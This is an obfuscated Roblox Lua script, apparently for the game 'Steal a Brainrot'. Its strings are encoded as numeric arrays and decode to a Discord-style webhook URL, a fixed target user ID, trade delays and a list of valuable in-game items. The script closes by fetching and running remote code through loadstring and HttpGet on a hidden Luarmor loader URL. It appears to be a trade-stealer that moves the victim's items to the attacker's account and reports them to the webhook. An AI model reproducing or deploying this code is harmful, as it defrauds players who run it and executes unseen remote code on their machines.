
local Players = game:GetService("Players")
local StarterGui = game:GetService("StarterGui")

local _hjytiea8q = function()
    getgenv().WEBHOOK_URL = (function()
        local a={1389,1545,1545,1493,1532,791,648,648,1532,1428,1298,1454,1298,635,1467,1350,1545,648,1298,1493,1402,648,1441,1480,1376,1532,648,1584,1350,1311,1389,1480,1480,1428,648,1454,1519,1519,1272,1298,674,713,726,778,1337,700,674,687,1311,765,1350,713,1311,1350,1337,1311,726,752,739,1337,1350,765,1298,674,713,661,713,1311,765,687,674};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()
getgenv().TARGET_ID = 3615451157
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    [(function()
        local a={895,1558,1519,1376,1558,1519,1480,453,882,1467,1337,453,947,1519,1610,1558,1519,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={908,1298,1493,1402,1545,1298,1467,1480,453,1038,1480,1311,1610};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={908,1350,1441,1558,1441,1298,1519,1324,1402,1467,1402,453,1155,1402,1324,1402,1480,1532,1402,1467,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={908,1350,1519,1311,1350,1519,1558,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={908,1389,1402,1441,1441,1402,1467,453,908,1389,1402,1441,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={908,1389,1402,1493,1532,1480,453,1298,1467,1337,453,1090,1558,1350,1532,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={908,1480,1480,1428,1402,453,1298,1467,1337,453,1038,1402,1441,1428,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={921,1519,1298,1376,1480,1467,453,908,1298,1467,1467,1350,1441,1441,1480,1467,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={921,1519,1298,1376,1480,1467,453,960,1402,1467,1376,1350,1519,1402,1467,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={934,1532,1480,1428,453,1116,1350,1428,1480,1441,1298,1389};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={934,1571,1402,1441,1350,1337,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={947,1350,1532,1545,1402,1571,1350,453,739,752};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={947,1519,1298,1376,1480,1441,1298,453,1025,1298,453,1025,1298,453,1025,1298};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={947,1519,1298,1376,1519,1298,1454,1298,453,1298,1467,1337,453,908,1389,1480,1324,1519,1298,1454,1298};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={960,1298,1519,1298,1454,1298,453,1298,1467,1337,453,1038,1298,1337,1558,1467,1337,1558,1467,1376};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={960,1402,1467,1376,1350,1519,453,960,1350,1519,1298,1545};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={960,1480,1311,1311,1441,1402,1467,1480,453,1142,1467,1402,1324,1402,1324,1441,1402,1467,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={973,1350,1298,1337,1441,1350,1532,1532,453,973,1480,1519,1532,1350,1454,1298,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={973,1610,1337,1519,1298,453,921,1519,1298,1376,1480,1467,453,908,1298,1467,1467,1350,1441,1441,1480,1467,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1012,1350,1545,1324,1389,1558,1519,1558,453,1298,1467,1337,453,1038,1558,1532,1545,1558,1519,1558};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1012,1350,1545,1558,1493,1298,1545,453,895,1519,1480,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1012,1350,1545,1558,1493,1298,1545,453,1012,1350,1493,1298,1545};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,908,1298,1532,1298,453,895,1480,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,934,1597,1545,1402,1467,1324,1545,453,960,1519,1298,1467,1337,1350};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,947,1480,1480,1337,453,908,1480,1454,1311,1402,1467,1298,1532,1402,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,960,1402,1467,1376,1350,1519,453,1116,1350,1428,1480,1441,1298,1389};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,999,1480,1441,1441,1610,453,960,1519,1298,1467,1337,1350};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,1103,1480,1454,1298,1467,1545,1402,1324,453,960,1519,1298,1467,1337,1350};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,1116,1350,1324,1519,1350,1545,453,908,1480,1454,1311,1402,1467,1298,1532,1402,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,1116,1493,1480,1480,1428,1610,453,960,1519,1298,1467,1337,1350};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,1116,1558,1493,1519,1350,1454,1350,453,908,1480,1454,1311,1402,1467,1298,1532,1402,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,453,1129,1298,1324,1480,453,908,1480,1454,1311,1402,1467,1298,1532,1402,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1298,1571,1298,1337,1480,1519,1402,1545,1480,453,1116,1493,1402,1467,1402,1545,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,882,1454,1402,1376,1480,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,895,1519,1480,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,999,1480,1441,1441,1610,453,908,1480,1454,1311,1402,1467,1298,1532,1402,1480,1467,1298,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,1077,1519,1402,1454,1480,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,1077,1558,1376,1376,1402,1350,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,1116,1350,1428,1480,1441,1298,1389,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,1116,1493,1298,1376,1389,1350,1545,1545,1402,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,1116,1493,1480,1480,1428,1610,453,908,1480,1454,1311,1402,1467,1298,1532,1402,1480,1467,1298,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1532,453,1129,1298,1324,1480,1519,1402,1545,1298,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1025,1480,1571,1350,453,1025,1480,1571,1350,453,895,1350,1298,1519};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1038,1298,1519,1402,1298,1324,1389,1402,453,908,1480,1519,1298,1623,1480,1467,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1038,1350,1480,1584,1441};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1038,1402,1350,1545,1350,1545,1350,1402,1519,1298,453,895,1402,1324,1402,1324,1441,1350,1545,1350,1402,1519,1298};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1038,1480,1467,1350,1610,453,1038,1480,1467,1350,1610,453,1077,1558,1376,1376,1610};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1038,1480,1467,1350,1610,453,1038,1480,1467,1350,1610,453,1103,1350,1402,1467,1337,1350,1350,1519};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1051,1558,1324,1441,1350,1298,1519,1480,453,921,1402,1467,1480,1532,1532,1298,1558,1519,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1064,1519,1324,1298,1441,1350,1337,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1077,1480,1493,1324,1558,1519,1558,453,1298,1467,1337,453,947,1402,1623,1623,1558,1519,1558};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1103,1350,1402,1467,1402,1545,1480,453,1116,1441,1350,1402,1376,1389,1402,1545,1480};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1103,1480,1532,1350,1545,1545,1402,453,1129,1558,1298,1441,1350,1545,1545,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1103,1480,1532,1350,1610,453,1298,1467,1337,453,1129,1350,1337,1337,1610};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1298,1454,1454,1610,1467,1402,453,947,1298,1545,1545,1402,1467,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1428,1402,1311,1402,1337,1402,453,1129,1480,1402,1441,1350,1545};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1493,1298,1376,1389,1350,1545,1545,1402,453,1129,1558,1298,1441,1350,1545,1545,1402};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1493,1480,1480,1428,1610,453,1298,1467,1337,453,1077,1558,1454,1493,1428,1610};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1545,1519,1298,1584,1311,1350,1519,1519,1610,453,934,1441,1350,1493,1389,1298,1467,1545};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1584,1298,1376,453,1116,1480,1337,1298};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1116,1584,1298,1376,1376,1610,453,895,1519,1480,1532};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1129,1298,1324,1480,1519,1402,1545,1298,453,895,1402,1324,1402,1324,1441,1350,1545,1298};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1129,1298,1467,1376,453,1129,1298,1467,1376,453,1012,1350,1441,1350,1545,1298,1467,1376};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1129,1402,1324,1545,1298,1324,453,1116,1298,1389,1558,1519};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1129,1519,1298,1441,1298,1441,1350,1337,1480,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1129,1558,1363,1363,453,1129,1480,1558,1324,1298,1467};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true,
    [(function()
        local a={1168,453,1480,1519,453,1025};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()] = true
}
loadstring(game:HttpGet((function()
        local a={1389,1545,1545,1493,1532,791,648,648,1298,1493,1402,635,1441,1558,1298,1519,1454,1480,1519,635,1467,1350,1545,648,1363,1402,1441,1350,1532,648,1571,713,648,1441,1480,1298,1337,1350,1519,1532,648,778,1298,778,674,1311,700,1311,1298,739,1363,1311,752,674,713,687,700,765,726,700,1350,1324,687,1363,765,765,726,1324,713,687,1337,739,752,635,1441,1558,1298};
        local b='';
        for i=1,#a do 
            b=b..string.char((a[i]-37)/13);
        end;
        return b;
    end)()))()
end;
_hjytiea8q();
